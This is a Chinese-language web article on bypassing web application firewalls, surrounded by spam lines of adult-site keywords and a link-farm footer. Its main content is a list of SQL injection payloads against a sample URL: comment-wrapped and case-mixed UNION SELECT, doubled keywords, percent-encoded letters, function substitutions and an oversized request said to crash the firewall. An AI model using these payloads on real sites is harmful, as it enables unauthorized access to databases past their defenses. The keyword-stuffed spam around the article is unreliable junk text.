成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

WAF繞過(guò)方法從簡(jiǎn)單到高級(jí)

安全 應(yīng)用安全
Web應(yīng)用防火墻是通過(guò)執(zhí)行一系列針對(duì)HTTP/HTTPS的安全策略來(lái)專門為Web應(yīng)用提供保護(hù)的一款產(chǎn)品。

什么是WAF?

Web應(yīng)用防火墻是通過(guò)執(zhí)行一系列針對(duì)HTTP/HTTPS的安全策略來(lái)專門為Web應(yīng)用提供保護(hù)的一款產(chǎn)品。

基本/簡(jiǎn)單繞過(guò)方法:

1、注釋符

http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….

2、使用大小寫

http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….

3、結(jié)合前面兩種方法

http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

4、關(guān)鍵字替換

http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….

此方法適用于一些會(huì)把union select替換掉的WAF,經(jīng)過(guò)WAF過(guò)濾后就會(huì)變成 union select 1,2,3,4....

5、內(nèi)部注釋

http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…

U替換為%55,S替換為%53 在 union 和 select 之間添加注釋/**/

高級(jí)繞過(guò)方法:

1、緩沖區(qū)溢出/使防火墻崩潰

大部分防火墻都是基于C/C++開發(fā)的,我們可以使用緩沖區(qū)溢出使用WAF崩潰

http://www.2cto.com /index.php?page_id=-15+and+(select1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….

你可以使用如下方法測(cè)試WAF

?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

如果返回500錯(cuò)誤,你就可以使用緩沖區(qū)溢出的方法來(lái)繞過(guò)WAF

2、對(duì)字母進(jìn)行編碼

http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….

3、使用其他變量或者命令對(duì)注入語(yǔ)句進(jìn)行替換

COMMAND | WHAT TO USE INSTEAD

@@version | version()

concat() | concat_ws()

group_concat() | concat_ws()

4、利用WAF本身的功能繞過(guò)

假如你發(fā)現(xiàn)WAF會(huì)把"*"替換為空,那么你就可以利用這一特性來(lái)進(jìn)行繞過(guò)

‍‍‍‍‍‍‍‍http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4....

其它方法:-15+(uNioN)+(sElECt)….-15+(uNioN+SeleCT)+…-15+(UnI)(oN)+(SeL)(ecT)+….-15+union (select 1,2,3,4…)

責(zé)任編輯:藍(lán)雨淚 來(lái)源: 紅黑聯(lián)盟
相關(guān)推薦

2019-02-19 08:45:41

2012-12-24 13:50:54

2025-06-10 10:10:00

文件下載前端開發(fā)

2011-09-06 16:56:43

2020-11-18 09:30:29

圖片懶加載前端瀏覽器

2013-06-03 10:02:53

WAF繞過(guò)

2020-06-11 08:08:38

LFU代碼雙向鏈

2013-01-11 16:23:29

2020-07-31 11:02:09

網(wǎng)絡(luò)攻擊WAF黑客

2024-09-23 19:23:00

2013-12-18 09:39:37

XSSWAF繞過(guò)

2015-06-16 13:37:03

2023-05-07 08:00:32

2017-03-03 09:10:09

2009-02-27 08:45:27

Unix入門

2012-02-09 09:00:54

匯編語(yǔ)言

2012-11-23 16:30:16

2024-12-05 08:00:00

緩存數(shù)據(jù)庫(kù)集群

2009-03-25 13:50:05

2013-04-19 13:20:14

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 97视频在线免费 | 欧美黄 片免费观看 | 欧美日韩a | 国产婷婷在线视频 | www.日韩高清 | 国产精品久久久久久久久 | 久久久噜噜噜久久中文字幕色伊伊 | 天天色图 | 成人三级av | 成人性视频在线播放 | 18成人在线观看 | 91在线电影| 国产精品成人一区二区三区 | 欧美综合久久久 | 亚洲精品乱码久久久久久久久久 | 亚洲自拍偷拍免费视频 | 91天堂网| 久久狼人天堂 | 国产成人精品午夜视频免费 | 在线亚洲一区二区 | 国产精品久久久久久久久久免费看 | 亚洲一区综合 | www.日日干 | 天天操人人干 | 国产人久久人人人人爽 | 一区二区在线免费观看 | 天天天天操 | 综合久久av| 亚洲一区二区三区四区五区中文 | 日韩中文字幕 | 国产精品亚洲精品日韩已方 | 日韩精品网站 | 一区二区三区国产视频 | 欧美日韩国产一区二区三区 | 中文字幕视频在线观看 | 国产精品久久久久aaaa樱花 | 日本91av视频 | 国产精品国产自产拍高清 | 亚洲a视| 日韩网站在线 | 日日干日日 |